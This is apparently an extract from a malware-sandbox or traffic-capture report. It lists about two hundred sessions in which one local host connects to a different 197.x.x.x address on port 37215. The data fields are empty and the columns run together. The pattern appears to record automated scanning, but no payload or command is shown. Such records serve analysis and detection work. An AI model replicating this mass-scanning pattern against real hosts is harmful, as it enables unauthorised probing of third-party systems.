                                                                            13534192.168.2.1535440197.234.68.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13535192.168.2.1538488197.66.25.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13536192.168.2.1549296197.130.167.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13537192.168.2.1551244197.39.147.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13538192.168.2.1540004197.83.30.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13539192.168.2.1555156197.184.143.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13540192.168.2.1542136197.20.95.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13541192.168.2.1533222197.60.124.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13542192.168.2.1549370197.127.62.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13543192.168.2.1553142197.202.197.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13544192.168.2.1535408197.219.171.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13545192.168.2.1533482197.29.120.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13546192.168.2.1533404197.183.164.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13547192.168.2.1541666197.135.144.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13548192.168.2.1541218197.120.135.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13549192.168.2.1548486197.108.84.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13550192.168.2.1543242197.125.203.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13551192.168.2.1554284197.150.108.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13552192.168.2.1551406197.121.254.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13553192.168.2.1536996197.27.36.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13554192.168.2.1559048197.188.229.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13555192.168.2.1540716197.27.86.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13556192.168.2.1547366197.164.198.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13557192.168.2.1552848197.71.50.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13558192.168.2.1559408197.128.106.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13559192.168.2.1533186197.125.132.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13560192.168.2.1537388197.236.68.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13561192.168.2.1534826197.89.122.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13562192.168.2.1540850197.204.185.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13563192.168.2.1543860197.151.226.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13564192.168.2.1545080197.11.176.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13565192.168.2.1553742197.199.101.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13566192.168.2.1556834197.174.28.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13567192.168.2.1559860197.80.179.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13568192.168.2.1547194197.59.210.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13569192.168.2.1558322197.129.58.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13570192.168.2.1544454197.8.25.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13571192.168.2.1555772197.236.195.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13572192.168.2.1547910197.198.204.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13573192.168.2.1539832197.174.189.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13574192.168.2.1554674197.89.239.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13575192.168.2.1550328197.178.8.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13576192.168.2.1548830197.169.220.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13577192.168.2.1532944197.52.195.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13578192.168.2.1538464197.175.250.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13579192.168.2.1554518197.217.119.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13580192.168.2.1552048197.149.230.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13581192.168.2.1551852197.85.216.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13582192.168.2.1544456197.64.172.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13583192.168.2.1557306197.153.147.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13584192.168.2.1558062197.168.12.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13585192.168.2.1553510197.181.8.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13586192.168.2.1548384197.227.151.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13587192.168.2.1554986197.118.63.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13588192.168.2.1558218197.9.205.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13589192.168.2.1551230197.90.61.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13590192.168.2.1538674197.111.198.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13591192.168.2.1533350197.161.181.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13592192.168.2.1533396197.65.85.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13593192.168.2.1540156197.71.88.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13594192.168.2.1548092197.193.38.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13595192.168.2.1556384197.208.18.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13596192.168.2.1539300197.13.133.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13597192.168.2.1551422197.89.209.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13598192.168.2.1545634197.177.153.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13599192.168.2.1536430197.216.150.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13600192.168.2.1549534197.169.23.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13601192.168.2.1547032197.150.246.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13602192.168.2.1558126197.148.150.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13603192.168.2.1553182197.241.53.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13604192.168.2.1560676197.229.60.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13605192.168.2.1545740197.254.223.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13606192.168.2.1548278197.140.90.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13607192.168.2.1538500197.189.102.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13608192.168.2.1538552197.34.133.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13609192.168.2.1539114197.3.153.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13610192.168.2.1541562197.67.207.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13611192.168.2.1543494197.158.156.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13612192.168.2.1551194197.164.159.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13613192.168.2.1543066197.251.65.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13614192.168.2.1556726197.103.160.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13615192.168.2.1534388197.235.0.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13616192.168.2.1545370197.238.150.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13617192.168.2.1541944197.161.164.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13618192.168.2.1547872197.253.129.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13619192.168.2.1539914197.109.174.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13620192.168.2.1534932197.196.225.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13621192.168.2.1558820197.172.97.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13622192.168.2.1557348197.132.255.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13623192.168.2.1536668197.192.86.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13624192.168.2.1543504197.181.158.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13625192.168.2.1555428197.236.154.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13626192.168.2.1546320197.114.116.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13627192.168.2.1543868197.194.67.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13628192.168.2.1534930197.50.159.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13629192.168.2.1536144197.218.159.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13630192.168.2.1536484197.216.55.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13631192.168.2.1556924197.116.164.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13632192.168.2.1555826197.92.10.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13633192.168.2.1552690197.11.236.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13634192.168.2.1541752197.233.169.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13635192.168.2.1554710197.20.0.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13636192.168.2.1547114197.235.63.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13637192.168.2.1537972197.241.217.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13638192.168.2.1554102197.29.190.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13639192.168.2.1555180197.192.56.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13640192.168.2.1535218197.105.198.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13641192.168.2.1559390197.194.58.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13642192.168.2.1552112197.10.177.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13643192.168.2.1545084197.58.25.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13644192.168.2.1560472197.126.95.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13645192.168.2.1536050197.211.48.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13646192.168.2.1547332197.163.119.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13647192.168.2.1550434197.143.72.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13648192.168.2.1543802197.14.252.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13649192.168.2.1554478197.147.40.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13650192.168.2.1542820197.56.77.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13651192.168.2.1540394197.132.233.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13652192.168.2.1559560197.92.225.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13653192.168.2.1544906197.179.71.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13654192.168.2.1546622197.6.181.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13655192.168.2.1540716197.241.201.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13656192.168.2.1553972197.243.53.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13657192.168.2.1554620197.94.163.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13658192.168.2.1533554197.9.204.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13659192.168.2.1559804197.11.128.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13660192.168.2.1535180197.35.144.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13661192.168.2.1535106197.254.244.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13662192.168.2.1560314197.222.136.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13663192.168.2.1559728197.13.39.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13664192.168.2.1553920197.226.25.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13665192.168.2.1554174197.220.143.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13666192.168.2.1548624197.25.66.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13667192.168.2.1560936197.9.216.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13668192.168.2.1557006197.37.190.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13669192.168.2.1542648197.247.232.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13670192.168.2.1557886197.55.106.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13671192.168.2.1539924197.88.90.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13672192.168.2.1532952197.223.214.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13673192.168.2.1533596197.117.58.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13674192.168.2.1539004197.243.40.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13675192.168.2.1538322197.161.9.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13676192.168.2.1556652197.191.87.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13677192.168.2.1549756197.180.224.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13678192.168.2.1551292197.104.183.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13679192.168.2.1554902197.6.159.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13680192.168.2.1551270197.56.27.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13681192.168.2.1537888197.87.9.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13682192.168.2.1545190197.237.10.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13683192.168.2.1542024197.218.107.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13684192.168.2.1537446197.253.236.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13685192.168.2.1541934197.143.88.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13686192.168.2.1541120197.246.166.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13687192.168.2.1533774197.87.9.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13688192.168.2.1534436197.166.226.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13689192.168.2.1547214197.133.200.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13690192.168.2.1546184197.234.145.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13691192.168.2.1546766197.136.33.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13692192.168.2.1548892197.177.149.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13693192.168.2.1540180197.45.80.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13694192.168.2.1536220197.106.172.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13695192.168.2.1537530197.85.142.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13696192.168.2.1548432197.79.161.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13697192.168.2.1543702197.80.51.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13698192.168.2.1541176197.237.76.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13699192.168.2.1550686197.40.117.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13700192.168.2.1555806197.14.35.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13701192.168.2.1549186197.150.149.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13702192.168.2.1534068197.115.85.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13703192.168.2.1536636197.141.182.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13704192.168.2.1548684197.110.115.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13705192.168.2.1539404197.108.38.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13706192.168.2.1552772197.3.159.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13707192.168.2.1547012197.228.194.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13708192.168.2.1556412197.125.16.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13709192.168.2.1544090197.91.72.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13710192.168.2.1533616197.234.125.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13711192.168.2.1535274197.209.92.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13712192.168.2.1557396197.225.98.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13713192.168.2.1558638197.102.224.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13714192.168.2.1535746197.154.26.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13715192.168.2.1550732197.81.108.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13716192.168.2.1535376197.137.176.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13717192.168.2.1534130197.157.166.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13718192.168.2.1539424197.218.209.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13719192.168.2.1555032197.225.3.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13720192.168.2.1540250197.255.184.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13721192.168.2.1549288197.241.173.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13722192.168.2.1553364197.242.179.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13723192.168.2.1555434197.21.147.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13724192.168.2.1551916197.173.29.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13725192.168.2.1542654197.205.25.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13726192.168.2.1551084197.16.78.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13727192.168.2.1535310197.67.96.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13728192.168.2.1552922197.176.196.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13729192.168.2.1551112197.115.120.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13730192.168.2.1560810197.61.144.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13731192.168.2.1536310197.167.2.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13732192.168.2.1534498197.31.251.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13733192.168.2.1535960197.160.65.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
